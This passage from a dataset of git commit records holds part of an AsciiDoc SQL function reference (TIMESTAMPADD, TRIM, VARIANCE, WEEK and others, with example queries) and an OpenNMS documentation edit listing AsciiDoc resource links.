8.48283639957512960E-001 or\r\napproximately 0.8483, the hyperbolic tangent of 1.25:\r\n+\r\n```\r\nTANH (1.25)\r\n```\r\n\r\n<<<\r\n[[this_function]]\r\n== THIS Function\r\n\r\nThe THIS function is a sequence function that is used in the ROWS SINCE\r\nfunction to distinguish between the value of the column in the current\r\nrow and the value of the column in previous rows (in an intermediate\r\nresult table ordered by a SEQUENCE BY clause in a SELECT statement).\r\nSee <<rows_since_function,ROWS SINCE Function>>.\r\n\r\nTHIS is a {project-name} SQL extension.\r\n\r\n```\r\nTHIS (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If the value of the expression is null, THIS returns null.\r\n\r\n[[considerations_for_this]]\r\n=== Considerations for THIS\r\n\r\n[[counting_the_rows]]\r\n==== Counting the Rows\r\n\r\nYou can use the THIS function only within the ROWS SINCE function. For\r\neach row, the ROWS SINCE condition is evaluated in two steps:\r\n\r\n\r\n1. The expression for THIS is evaluated for the current row. This value\r\nbecomes a constant.\r\n2. The condition is evaluated for the result table, using a combination\r\nof the THIS constant and the data for each row in the result table,\r\nstarting with the previous row as row 1 (up to the maximum number of\r\nrows or the size of the result table).\r\n\r\n\r\nIf a row is reached where the condition is true, ROWS SINCE returns the\r\nnumber of rows counted so far. Otherwise, if the condition is never true\r\nwithin the result table being considered, ROWS SINCE returns null.\r\n{project-name} SQL then goes to the next row as the new current row and the\r\nTHIS constant is reevaluated.\r\n\r\n<<<\r\n[[examples_of_this]]\r\n=== Examples of THIS\r\n\r\n* Return the number of rows since the condition _i1_ less than a previous\r\nrow became true:\r\n+\r\n```\r\nSELECT ROWS SINCE (THIS(i1) < i1) AS rows_since_this\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nrows_since_this\r\n---------------\r\n ?\r\n ?\r\n 1\r\n 1\r\n ?\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[timestampadd_function]]\r\n== TIMESTAMPADD Function\r\n\r\nThe TIMESTAMPADD function adds the interval of time specified by\r\n_interval-ind_ and _num_expr_ to _datetime_expr_. If the specified\r\ninterval is in years, months, or quarters and the resulting date is not\r\na valid date, the day will be rounded down to the last day of the result\r\nmonth. The type of the _datetime_expr_ is returned except when the\r\n_interval-ind_ contains any time component, in which case a TIMESTAMP is\r\nreturned.\r\n\r\nTIMESTAMPADD is a {project-name} SQL extension.\r\n\r\n```\r\nTIMESTAMPADD (interval-ind, num-expr, datetime-expr)\r\n```\r\n\r\n* `_interval-ind_`\r\n+\r\nis SQL_TSI_YEAR, SQL_TSI_MONTH, SQL_TSI_DAY, SQL_TSI_HOUR,\r\nSQL_TSI_MINUTE, SQL_TSI_SECOND, SQL_TSI_QUARTER, or SQL_TSI_WEEK\r\n\r\n* `_num_expr_`\r\n+\r\nis an SQL exact numeric value expression that specifies how many\r\n_interval-ind_ units of time are to be added to _datetime_expr_. If\r\n_num_expr_ has a fractional portion, it is ignored. If _num_expr_ is\r\nnegative, the return value precedes _datetime_expr_ by the specified\r\namount of time.\r\n\r\n* `_datetime_expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. The type of the _datetime_expr_ is returned except when the\r\n_interval-ind_ contains any time component, in which case a TIMESTAMP is\r\nreturned.\r\n\r\n<<<\r\n[[examples_of_timestampadd]]\r\n=== Examples of TIMESTAMPADD\r\n\r\n* This function adds seven days to the date specified in _start-date_:\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_DAY, 7, start-date)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-06':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_WEEK, 1, DATE '2008-02-28')\r\n```\r\n\r\n* This function returns the value DATE '1999-02-28':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_YEAR, -1, DATE '2000-02-29')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2003-02-28 13:27:35':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_MONTH, -12, TIMESTAMP '2004-02-29 13:27:35')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2004-02-28 13:27:35':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_MONTH, 12, TIMESTAMP '2003-02-28 13:27:35')\r\n```\r\n\r\n* This function returns the value DATE '2008-06-30':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_QUARTER, -2, DATE '2008-12-31')\r\n```\r\n\r\n* This function returns the value TIMESTAMP '2008-06-30 23:59:55':\r\n+\r\n```\r\nTIMESTAMPADD (SQL_TSI_SECOND, -5, DATE '2008-07-01')\r\n```\r\n\r\n<<<\r\n[[timestampdiff_function]]\r\n== TIMESTAMPDIFF Function\r\n\r\nThe TIMESTAMPDIFF function returns the integer value for the number of\r\n_interval-ind_ units of time between _startdate_ and _enddate_. If\r\n_enddate_ precedes _startdate_, the return value is negative or zero.\r\n\r\n```\r\nTIMESTAMPDIFF (interval-ind, startdate, enddate)\r\n```\r\n\r\n* `_interval-ind_`\r\n+\r\nis SQL_TSI_YEAR, SQL_TSI_MONTH, SQL_TSI_DAY, SQL_TSI_HOUR,\r\nSQL_TSI_MINUTE, SQL_TSI_SECOND, SQL_TSI_QUARTER, or SQL_TSI_WEEK\r\n\r\n* `_startdate_` and `_enddate_`\r\n+\r\nare each of type DATE or TIMESTAMP\r\n\r\nThe method of counting crossed boundaries such as days, minutes, and\r\nseconds makes the result given by TIMESTAMPDIFF consistent across all\r\ndata types. The TIMESTAMPDIFF function makes these boundary assumptions:\r\n\r\n* A year begins at the start of January 1.\r\n* A new quarter begins on January 1, April 1, July 1, and October 1.\r\n* A week begins at the start of Sunday.\r\n* A day begins at midnight.\r\n\r\nThe result is a signed integer value equal to the number of\r\n_interval-ind_ boundaries crossed between the first and second date. For\r\nexample, the number of weeks between Sunday, January 4 and Sunday,\r\nJanuary 1 is 1. The number of months between March 31 and April 1 would\r\nbe 1 because the month boundary is crossed from March to April.\r\n\r\nThe TIMESTAMPDIFF function generates an error if the result is out of\r\nrange for integer values. For seconds, the maximum number is equivalent\r\nto approximately 68 years. The TIMESTAMPDIFF function generates an error\r\nif a difference in weeks is requested and one of the two dates precedes\r\nJanuary 7 of the year 0001.\r\n\r\n<<<\r\n[[examples_of_timestampdiff]]\r\n=== Examples of TIMESTAMPDIFF\r\n\r\n* This function returns the value 1 because a 1-second boundary is\r\ncrossed even though the two timestamps differ by only one microsecond:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n(\r\n SQL_TSI_SECOND\r\n, TIMESTAMP '2006-09-12 11:59:58.999999'\r\n, TIMESTAMP '2006-09-12 11:59:59.000000'\r\n)\r\n```\r\n\r\n* This function returns the value 0 because no 1-second boundaries are\r\ncrossed:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n( SQL_TSI_YEAR\r\n, TIMESTAMP '2006-12-31 23:59:59.00000\r\n, TIMESTAMP '2006-12-31 23:59:59.999999'\r\n)\r\n```\r\n\r\n* This function returns the value 1 because a year boundary is crossed:\r\n+\r\n```\r\nTIMESTAMPDIFF\r\n( SQL_TSI_YEAR\r\n, TIMESTAMP '2006-12-31 23:59:59.999999'\r\n, TIMESTAMP '2007-01-01 00:00:00.000000;\r\n)\r\n```\r\n\r\n* This function returns the value 1 because a WEEK boundary is crossed:\r\n+\r\n```\r\nTIMESTAMPDIFF (SQL_TSI_WEEK, DATE '2006-01-01', DATE '2006-01-09')\r\n```\r\n\r\n* This function returns the value of -29:\r\n+\r\n```\r\nTIMESTAMPDIFF (SQL_TSI_DAY, DATE '2004-03-01', DATE '2004-02-01')\r\n```\r\n\r\n<<<\r\n[[translate_function]]\r\n== TRANSLATE Function\r\n\r\nThe TRANSLATE function translates a character string from a source\r\ncharacter set to a target character set. The TRANSLATE function changes\r\nboth the character string data type and the character set encoding of\r\nthe string.\r\n\r\n```\r\nTRANSLATE(character-value-expression USING translation-name)\r\n```\r\n\r\n* `_character-value-expression_`\r\n+\r\nis a character string.\r\n\r\n* `_translation-name_`\r\n+\r\nis one of these translation names:\r\n+\r\n[cols=\"25%l,25%l,25%l,25%\",options=\"header\"]\r\n|===\r\n| Translation Name | Source Character Set | Target Character Set | Comments\r\n| ISO88591TOUTF8 | ISO88591 | UTF8 | Translates ISO8859-1 characters to UTF8 characters. No data loss is possible.\r\n| UTF8TOISO88591 | UTF8 | ISO88591 | Translates UTF8 characters to ISO88591 characters. {project-name} SQL will\r\ndisplay an error if it encounters a Unicode character that cannot be converted to the target character set.\r\n|===\r\n\r\n_translation-name_ identifies the translation, source and target\r\ncharacter set. When you translate to the UTF8 character set, no data\r\nloss is possible. However, when {project-name} SQL translates a\r\n_character-value-expression_ from UTF8, it may be that certain\r\ncharacters cannot be converted to the target character set. {project-name}\r\nSQL reports an error in this case.\r\n\r\n{project-name} SQL returns a variable-length character string with character\r\nrepertoire equal to the character repertoire of the target character set\r\nof the translation and the maximum length equal to the fixed length or\r\nmaximum variable length of the source _character-value-expression_.\r\n\r\nIf you enter an illegal _translation-name_, {project-name} SQL returns an\r\nerror.\r\n\r\nIf the character set for _character-value-expression_ is different from\r\nthe source character set as specified in the _translation-name_,\r\n{project-name} SQL returns an error.\r\n\r\n<<<\r\n[[trim_function]]\r\n== TRIM Function\r\n\r\nThe TRIM function removes leading and trailing characters from a\r\ncharacter string. Every character, including multi-byte characters, is\r\ntreated as one character.\r\n\r\n```\r\nTRIM ([[trim-type] [trim-char] FROM] trim-source)\r\n```\r\n\r\n* `_trim-type_` is:\r\n+\r\n```\r\nLEADING | TRAILING | BOTH\r\n```\r\n\r\n* `_trim-type_`\r\n+\r\nspecifies whether characters are to be trimmed from the leading end\r\n(LEADING), trailing end (TRAILING), or both ends (BOTH) of\r\n_trim-source_. If you omit _trim-type_, the default is BOTH.\r\n\r\n* `_trim_char_`\r\n+\r\nis an SQL character value expression and specifies the character to be\r\ntrimmed from _trim-source. trim_char_ has a maximum length of 1. If you omit\r\n_trim_char_, SQL trims blanks (' ') from _trim-source_.\r\n\r\n* `_trim-source_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim characters. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_trim]]\r\n=== Considerations for TRIM\r\n\r\n[[result_of_trim]]\r\n==== Result of TRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _trim-source_. If the\r\nsource character string is an up-shifts CHAR or VARCHAR string, the\r\nresult is an up-shifts VARCHAR type.\r\n\r\n<<<\r\n[[examples_of_trim]]\r\n=== Examples of TRIM\r\n\r\n* Return 'Robert':\r\n+\r\n```\r\nTRIM(' Robert ')\r\n```\r\n\r\n* The EMPLOYEE table defines FIRST_NAME as CHAR(15) and LAST_NAME as\r\nCHAR(20). This expression uses the TRIM function to return the value\r\n'Robert Smith' without extra blanks:\r\n+\r\n```\r\nTRIM(first_name) || ' ' || TRIM (last_name)\r\n```\r\n\r\n<<<\r\n[[ucase_function]]\r\n== UCASE Function\r\n\r\nThe UCASE function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UCASE returns the same character. UCASE can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UCASE function is equal to\r\nthe result returned by the <<upper_function,UPPER Function>>\r\nor <<upshift_function,UPSHIFT Function>>.\r\n\r\nUCASE returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nUCASE is a {project-name} SQL extension.\r\n\r\n```\r\nUCASE (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ucase]]\r\n=== Considerations for UCASE\r\n\r\nFor a UTF8 character_expression, the UCASE function up-shifts all\r\nlowercase or title case characters to uppercase and returns a character\r\nstring. If the argument is of type CHAR(_n_) or VARCHAR(_n_), the\r\nresult is of type VARCHAR(min(3_n_, 2048)), where the maximum length\r\nof VARCHAR is the minimum of 3_n_ or 2048, whichever is smaller.\r\n\r\nA lowercase character is a character that has the \"alphabetic\" property\r\nin Unicode Standard 2 and whose Unicode name includes lower. An\r\nuppercase character is a character that has the \"alphabetic\" property\r\nand whose Unicode name includes upper. A title case character is a\r\ncharacter that has the Unicode \"alphabetic\" property and whose Unicode\r\nname includes _title_.\r\n\r\n<<<\r\n[[examples_of_ucase]]\r\n=== Examples of UCASE\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return in uppercase and lowercase letters\r\nby using the UCASE and LCASE functions:\r\n+\r\n```\r\nSELECT custname,UCASE(custname),LCASE(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<lcase_function,LCASE Function>>.\r\n\r\n<<<\r\n[[upper_function]]\r\n=== UPPER Function\r\n\r\nThe UPPER function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UCASE returns the same character. UPPER can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UPPER function is equal to\r\nthe result returned by the <<upshift_function,UPSHIFT Function>> or <<ucase_function,UCASE Function>>.\r\n\r\nUPPER returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\n```\r\nUPPER (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_upper]]\r\n=== Examples of UPPER\r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return in uppercase and lowercase letters\r\nby using the UPPER and LOWER functions:\r\n+\r\n```\r\nSELECT custname,UPPER(custname),LOWER(custname) FROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHotel Oregon HOTEL OREGON hotel oregon\r\n\r\n--- 17 row(s) selected.\r\n```\r\n+\r\nSee <<lower_function,LOWER Function>>.\r\n+\r\nFor examples of when to use the UPPER function,\r\nsee <<upshift_function,UPSHIFT Function>>.\r\n\r\n<<<\r\n[[upshift_function]]\r\n=== UPSHIFT Function\r\n\r\nThe UPSHIFT function up-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, UCASE returns the same character. UPSHIFT\r\ncan appear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the UPSHIFT function is equal\r\nto the result returned by the <<upper_function,UPPER Function>> or\r\n<<ucase_function,UCASE Function>>.\r\n\r\nUPSHIFT returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nUPSHIFT is a {project-name} SQL extension.\r\n\r\n```\r\nUPSHIFT (character-expression)\r\n```\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters to upshift. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_upshift]]\r\n=== Examples of UPSHIFT \r\n\r\n* Suppose that your CUSTOMER table includes an entry for Hotel Oregon.\r\nSelect the column CUSTNAME and return a result in uppercase and\r\nlowercase letters by using the UPSHIFT, UPPER, and LOWER functions:\r\n+\r\n```\r\nSELECT UPSHIFT(custname), UPPER(custname), UCASE(custname)\r\nFROM sales.customer;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n----------------- ------------------- ------------------\r\n... ... ...\r\nHOTEL OREGON HOTEL OREGON HOTEL OREGON\r\n\r\n--- 17 row(s) selected.\r\n```\r\n\r\n<<<\r\n* Perform a case-insensitive search for the DataSpeed customer:\r\n+\r\n```\r\nSELECT *\r\nFROM sales.customer\r\nWHERE UPSHIFT (custname) = 'DATASPEED';\r\n\r\nCUSTNAME STREET CITY ...\r\n---------- -------------------- --------- ...\r\nDataSpeed 300 SAN GABRIEL WAY NEW YORK ...\r\n\r\n--- 1 row(s) selected.\r\n```\r\n+\r\nIn the table, the name can be in lowercase, uppercase, or mixed case letters.\r\n\r\n* Suppose that your database includes two department tables: DEPT1 and\r\nDEPT2. Return all rows from the two tables in which the department names\r\nhave the same value regardless of case:\r\n+\r\n```\r\nSELECT *\r\nFROM persnl.dept1 D1, persnl.dept2 D2\r\nWHERE UPSHIFT(D1.deptname) = UPSHIFT(D2.deptname);\r\n```\r\n\r\n<<<\r\n[[user_function]]\r\n== USER Function\r\n\r\nThe USER function returns either the database user name associated with\r\nthe specified user ID number or the database user name of the current\r\nuser who invoked the function. The current user\r\n\r\nis the authenticated user who started the session. That database\r\nuser name is used for authorization of SQL statements in the current\r\nsession.\r\n\r\n```\r\nUSER [(user-id)]\r\n```\r\n\r\n* `_user-id_`\r\n+\r\nis the 32-bit number associated with a database user name.\r\n+\r\nThe USER function is similar to the <<authname_function,AUTHNAME Function>>\r\nand the <<current_user_function,CURRENT USER Function>>.\r\n\r\n[[considerations_for_user]]\r\n=== Considerations for USER\r\n\r\n* This function can be specified only in the top level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n[[examples_of_user]]\r\n=== Examples of USER\r\n\r\n* This example shows the database user name of the current user who is\r\nlogged in to the session:\r\n+\r\n```\r\nSELECT USER FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nTSHAW\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n* This example shows the database user name associated with the user ID number, 33333:\r\n+\r\n```\r\nSELECT USER (33333) FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nDB ROOT\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[variance_function]]\r\n== VARIANCE Function\r\n\r\nVARIANCE is an aggregate function that returns the statistical variance\r\nof a set of numbers. VARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nVARIANCE ([ALL | DISTINCT] expression [, weight])\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe VARIANCE of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the VARIANCE function is applied.\r\nIf DISTINCT is specified, you cannot specify _weight_.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric value expression that determines the values for\r\nwhich to compute the variance. _expression_ cannot contain an aggregate\r\nfunction or a subquery. The DISTINCT clause specifies that the VARIANCE\r\nfunction operates on distinct values from the one-column table derived\r\nfrom the evaluation of _expression_.\r\n\r\n* `_weight_`\r\n+\r\nspecifies a numeric value expression that determines the weights of the\r\nvalues for which to compute the variance. _weight_ cannot contain an\r\naggregate function or a subquery. _weight_ is defined on the same table\r\nas _expression_. The one-column table derived from the evaluation of\r\n_expression_ and the one-column table derived from the evaluation of\r\n_weight_ must have the same cardinality.\r\n\r\n[[considerations_for_variance]]\r\n=== Considerations for VARIANCE\r\n\r\n[[definition_of_variance]]\r\n==== Definition of VARIANCE\r\n\r\nSuppose that _vi_ are the values in the one-column table derived from\r\nthe evaluation of _expression_. _N_ is the cardinality of this\r\none-column table that is the result of applying the _expression_ to each\r\nrow of the source table and eliminating rows that are null.\r\n\r\nIf _weight_ is specified, _wi_ are the values derived from the\r\nevaluation of _weight_. _N_ is the cardinality of the two-column table\r\nthat is the result of applying the _expression_ and _weight_ to each row\r\nof the source table and eliminating rows that have nulls in either\r\ncolumn.\r\n\r\n===== Definition When Weight Is Not Specified\r\n\r\nIf _weight_ is not specified, the statistical variance of the values in\r\nthe one-column result table is defined as:\r\n\r\nwhere _vi_ is the i-th value of _expression_, _v_ is the average value\r\nexpressed in the common data type, and N is the cardinality of the\r\nresult table.\r\n\r\nBecause the definition of variance has _N-1_ in the denominator of the\r\nexpression (when weight is not specified), {project-name} SQL returns a\r\ndefault value of zero (and no error) if the number of rows in the table,\r\nor a group of the table, is equal to 1.\r\n\r\n===== Definition When Weight Is Specified\r\n\r\nIf _weight_ is specified, the statistical variance of the values in the\r\ntwo-column result table is defined as:\r\n\r\nwhere vi is the i-th value of _expression_, _wi_ is the i-th value of\r\n_weight_, _vw_ is the weighted average value expressed in the common\r\ndata type, and N is the cardinality of the result table.\r\n\r\n===== Weighted Average\r\n\r\nThe weighted average _vw_ of _vi_ and _wi_ is defined as:\r\n\r\nwhere vi is the i-th value of _expression_, _wi_ is the i-th value of\r\n_weight_, and N is the cardinality of the result table.\r\n\r\n\r\n[[data_type_of_the_result]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result is always DOUBLE PRECISION.\r\n\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable — but cannot include an aggregate function. These expressions are\r\nvalid:\r\n\r\n```\r\nVARIANCE (SALARY) VARIANCE (SALARY * 1.1)\r\nVARIANCE (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[variance_nulls]]\r\n==== Nulls\r\n\r\nVARIANCE is evaluated after eliminating all nulls from the set. If the\r\nresult table is empty, VARIANCE returns NULL.\r\n\r\n\r\n[[float54_and_double_precision_data]]\r\n==== FLOAT(54) and DOUBLE PRECISION Data\r\n\r\nAvoid using large FLOAT(54) or DOUBLE PRECISION values as arguments to\r\nVARIANCE. If SUM(x * x) exceeds the value of 1.15792089237316192e77 during\r\nthe computation of VARIANCE(x), then a numeric overflow occurs.\r\n\r\n[[examples_of_variance]]\r\n=== Examples of VARIANCE\r\n\r\n* Compute the variance of the salary of the current employees:\r\n+\r\n```\r\nSELECT VARIANCE(salary) AS Variance_Salary FROM persnl.employee;\r\n\r\nVARIANCE_SALARY\r\n-------------------------\r\n 1.27573263588496116E+009\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Compute the variance of the cost of parts in the current inventory:\r\n+\r\n```\r\nSELECT VARIANCE (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n-------------------------\r\n 5.09652410092950336E+013\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[week_function]]\r\n== WEEK Function\r\n\r\nThe WEEK function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 54 that represents the\r\ncorresponding week of the year. If the year begins on a Sunday, the\r\nvalue 1 will be returned for any datetime that occurs in the first 7\r\ndays of the year. Otherwise, the value 1 will be returned for any\r\ndatetime that occurs in the partial week before the start of the first\r\nSunday of the year. The value 53 is returned for datetimes that occur in\r\nthe last full or partial week of the year except for leap years that\r\nstart on Saturday where December 31 is in the 54th full or partial week.\r\n\r\nWEEK is a {project-name} SQL extension.\r\n\r\n```\r\nWEEK (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_week]]\r\n=== Examples of WEEK\r\n\r\n* Return an integer that represents the week of the year from the\r\nSTART_DATE column in the PROJECT table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, WEEK(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- --------------\r\n2008-04-10 2008-04-21 08:15:00.000000 |15\r\n```\r\n\r\n<<<\r\n[[year_function]]\r\n== YEAR Function\r\n\r\nThe YEAR function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value that represents the year.\r\n\r\nYEAR is a {project-name} SQL extension.\r\n\r\n```\r\nYEAR (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_year]]\r\n=== Examples of YEAR\r\n\r\n* Return an integer that represents the year from the start date column in\r\nthe project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, YEAR(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 2008\r\n```\r\n\r\n\r\n<<<\r\n[[zeroifnull_function]]\r\n== ZEROIFNULL Function\r\n\r\nThe ZEROIFNULL function returns a value of zero if the expression if\r\nNULL. Otherwise, it returns the value of the expression.\r\n\r\n```\r\nZEROIFNULL (expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies a value expression. It must be a numeric data type.\r\n\r\n[[examples_of_zeroifnull]]\r\n=== Examples of ZEROIFNULL\r\n\r\n* ZEROIFNULL returns the value of the column named salary whenever the\r\ncolumn value is not NULL and it returns 0 whenever the column value is\r\nNULL.\r\n+\r\n```\r\nZEROIFNULL (salary)\r\n```\r\n\r\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f3cb70f73c3a73eb4e1e4a9943509f5e2f003af","subject":"Update cheat-sheets.adoc","message":"Update cheat-sheets.adoc","repos":"roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-doc\/src\/asciidoc\/text\/cheat-sheets.adoc","new_file":"opennms-doc\/guide-doc\/src\/asciidoc\/text\/cheat-sheets.adoc","new_contents":"\n[[doc-guidelines-cheat-sheets]]\n== Cheat Sheets and additional hints\n\nFor instructions on how to build your own version of the manual:\nhttps:\/\/github.com\/OpenNMS\/opennms\/blob\/development\/docs\/opennms-doc\/doc-overview\/README.adoc[readme]\n\nThe documentation uses the AsciiDoc format. There are a number of guides that will help you to get started with using AsciiDoc:\n\n* http:\/\/www.methods.co.nz\/asciidoc\/[Aciidoc Reference]\n* http:\/\/www.methods.co.nz\/asciidoc\/faq.html[AsciiDoc FAQ]\n* http:\/\/powerman.name\/doc\/asciidoc[AsciiDoc cheatsheet]\n* http:\/\/xpt.sourceforge.net\/techdocs\/nix\/tool\/asciidoc-syn\/ascs01-AsciiDocMarkupSyntaxQuickSummary\/single\/[AsciiDoc Cheatsheet]\n\nFor other resources, to gain familiarity with AsciiDoc, you can visit:\n\n * http:\/\/asciidoctor.org\/docs\/user-manual[AsciiDoc User Manual]\n * http:\/\/asciidoctor.org\/docs\/install-and-use-asciidoctor-maven-plugin\/[AsciiDoc Maven Plugin]\n * https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/asciidoc[AsciiDoc discussion list]\n * http:\/\/code.google.com\/p\/asciidoc\/issues\/list[AsciiDoc issue tracker]\n * https:\/\/github.com\/oreillymedia\/docbook2asciidoc[Docbook to AsciiDoc]\n * http:\/\/blog.rainwebs.net\/2010\/02\/25\/how-to-create-handsome-pdf-documents-without-frustration\/[How to create handsome PDF documents without frustration]\n\nnb. We recommend you use the cheatsheets (they are super useful!).\n","old_contents":"\n[[doc-guidelines-cheat-sheets]]\n== Cheat Sheets and additional hints\n\nFor how to build the manual see:\nhttps:\/\/github.com\/OpenNMS\/opennms\/blob\/development\/docs\/opennms-doc\/doc-overview\/README.adoc[readme]\n\nThe documents use the AsciiDoc format, see:\n\n* http:\/\/www.methods.co.nz\/asciidoc\/[Aciidoc Reference]\n* http:\/\/www.methods.co.nz\/asciidoc\/faq.html[AsciiDoc FAQ]\n* http:\/\/powerman.name\/doc\/asciidoc[AsciiDoc cheatsheet]\n* http:\/\/xpt.sourceforge.net\/techdocs\/nix\/tool\/asciidoc-syn\/ascs01-AsciiDocMarkupSyntaxQuickSummary\/single\/[AsciiDoc Cheatsheet]\n\nHere you can find other resources to get familiar with AsciiDoc, see:\n\n * http:\/\/asciidoctor.org\/docs\/user-manual[AsciiDoc User Manual]\n * http:\/\/asciidoctor.org\/docs\/install-and-use-asciidoctor-maven-plugin\/[AsciiDoc Maven Plugin]\n * https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/asciidoc[AsciiDoc discussion list]\n * http:\/\/code.google.com\/p\/asciidoc\/issues\/list[AsciiDoc issue tracker]\n * https:\/\/github.com\/oreillymedia\/docbook2asciidoc[Docbook to AsciiDoc]\n * http:\/\/blog.rainwebs.net\/2010\/02\/25\/how-to-create-handsome-pdf-documents-without-frustration\/[How to create handsome PDF documents without frustration]\n\nThe cheatsheets are really useful!\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e53709b846966fbbe694ff755b93d7d0b0787ef6","subject":"fix misplaced tag parameter in backup command (#1410)","message":"fix misplaced tag parameter in backup command 